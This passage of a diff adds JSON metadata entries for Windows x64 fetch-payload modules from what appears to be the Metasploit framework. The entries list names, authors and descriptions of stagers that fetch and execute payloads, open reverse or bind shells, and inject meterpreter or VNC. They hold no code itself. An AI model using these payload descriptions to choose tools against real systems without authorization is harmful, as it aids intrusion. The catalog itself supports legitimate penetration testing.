"windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_winhttp": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/vncinject/reverse_winhttps": { + "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + 
"platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/custom/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + 
"payload_cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/custom/bind_named_pipe": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp_rc4": { + "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_rc4", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/custom/bind_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/custom/reverse_http": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/custom/reverse_https": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and 
execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/custom/reverse_named_pipe": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": 
"windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": 
"cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/custom/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + 
"payload_cmd/windows/https/x64/custom/reverse_winhttp": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/https/x64/custom/reverse_winhttps": { + "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + 
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": { + "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/https/x64/encrypted_shell_reverse_tcp": { + "name": "HTTPS Fetch, Windows Encrypted Reverse Shell", + "fullname": 
"payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/exec": { + "name": "HTTPS Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/https/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/exec", + "staged": false 
+ }, + "payload_cmd/windows/https/x64/loadlibrary": { + "name": "HTTPS Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/https/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/https/x64/messagebox": { + "name": "HTTPS Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/https/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/windows/https/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + 
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/meterpreter/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an 
